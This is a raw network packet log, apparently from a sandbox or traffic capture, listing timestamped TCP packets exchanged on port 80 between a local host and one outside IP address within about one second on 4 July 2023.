Jul 4, 2023 11:17:57.458277941 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.458302021 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.458302021 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.458322048 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.458322048 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.458337069 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.458359957 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.458362103 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.458400965 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.458429098 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.458580971 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.458605051 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.458657980 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.458684921 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.458705902 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.458705902 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.458710909 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.458729982 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.458731890 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.458786964 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.458786964 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.458848000 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.458920956 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.459095001 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.459117889 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.459192038 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.459206104 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.459217072 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.459273100 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.459323883 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.459381104 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.459410906 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.459482908 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.497359991 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.497438908 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.497473955 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.497523069 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.615609884 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.615674019 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.615710020 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.615719080 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.615787029 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.615787029 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.615816116 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.615885973 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.615962029 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.616017103 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.616537094 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.616576910 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.616668940 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.616723061 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.616806030 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.616897106 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.616951942 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.617018938 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.617094994 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.617180109 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.617244005 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.617314100 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.617439032 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.617523909 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.617532015 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.617568970 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.617590904 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.617608070 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.617614985 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.617640972 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.617660046 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.617794991 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.617876053 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.617933035 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.618016958 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.618067026 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.618129969 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.619517088 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.619699955 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.625300884 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.625380039 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.625418901 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.625458002 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.625479937 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.625499964 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.625686884 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.625720978 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.625746965 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.625751972 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.625772953 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.625818014 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.626013994 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.626045942 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.626079082 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.626079082 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.626096010 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.626123905 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.626183987 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.626293898 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.626327991 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.626343966 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.626388073 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.626388073 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.626549006 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.626609087 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.626646996 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.626677990 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.626699924 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.626737118 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.626849890 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.626880884 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.626898050 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.626944065 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.627010107 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.627151012 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.627183914 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.627214909 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.627258062 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.627275944 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.627420902 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.627454042 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.627517939 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.627541065 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.627573967 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.627592087 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.627676010 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.627700090 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.627707005 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.627733946 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.627837896 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.627841949 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.627856970 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.627909899 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.628016949 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.628102064 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.628212929 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.628313065 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.628314018 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.628372908 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.628396988 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.628467083 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.628654003 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.628684044 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.628715038 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.628732920 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.628743887 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.628752947 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.628772974 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.628869057 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.628897905 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.628917933 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.628928900 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.629009962 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.629062891 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.629062891 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.629132032 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.629249096 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.629333019 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.629359007 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.629395008 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.629458904 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.629561901 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.629584074 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.629611015 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.629635096 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.629662037 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.629832029 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.629832029 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.629841089 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.629911900 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.629920006 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.629993916 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.630036116 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.630062103 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.630085945 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.630117893 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.630153894 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.630213976 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.630222082 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.630276918 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.630367994 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.630449057 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.630525112 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.630594015 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.630682945 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.630706072 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.630742073 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.630768061 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.630877972 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.630899906 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.630933046 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.630964041 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.631021023 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.631092072 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.631242990 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.631316900 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.631400108 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.631424904 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.631448030 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.631449938 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.631474972 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.631488085 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.631499052 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.631566048 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.631648064 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.631783009 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.631875038 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.631978989 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.632004023 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.632026911 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.632042885 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.632069111 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.632086039 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.632091045 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.632179976 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.632450104 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.632477045 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.632591963 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.632750988 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.632910967 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.632934093 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.633050919 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.633286953 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.633326054 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.633393049 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.633677959 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.667654037 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.667706966 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.667733908 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.706959009 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.785665035 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.785775900 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.785794020 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.786093950 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.786111116 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.786281109 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.786427975 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.786586046 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.786756992 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.786896944 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.787286043 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.787442923 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.787590981 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.787770033 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.787974119 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.788152933 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.788310051 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.788494110 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.788606882 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.788815022 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.788969040 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.789153099 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.789308071 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.789475918 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.789709091 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.790153980 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.790326118 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.790497065 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.790608883 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.790806055 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.790915966 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.791098118 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.791112900 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.791245937 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.791429043 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.791623116 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.791810036 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.791925907 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.792124987 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.792300940 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.792457104 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.792665005 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.792682886 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.792825937 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.792998075 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.793164015 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.793346882 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.793508053 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.793656111 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.793672085 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.793801069 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.794051886 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.794192076 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.794208050 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.794368982 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.794498920 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.794718027 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.794984102 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.795156002 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.795336962 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.795485020 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.795696974 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.795852900 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.796013117 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.796212912 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.796354055 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.796505928 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.796700001 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.796848059 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.797092915 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.797280073 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.797467947 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.797532082 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.797647953 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.797818899 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.797979116 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.797993898 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.798140049 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.798305035 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.798527002 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.798724890 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.798743010 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.798813105 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.799045086 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.799185038 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.799201965 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.799356937 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.799516916 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.799676895 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.799866915 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.800048113 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.800208092 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.800406933 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.800425053 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.800534964 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.800726891 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.800888062 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.801054955 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.801070929 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.801203012 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.801393986 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.801541090 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.801789999 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.801806927 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.801852942 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.802054882 CEST	80	49185	141.8.192.151	192.168.2.22
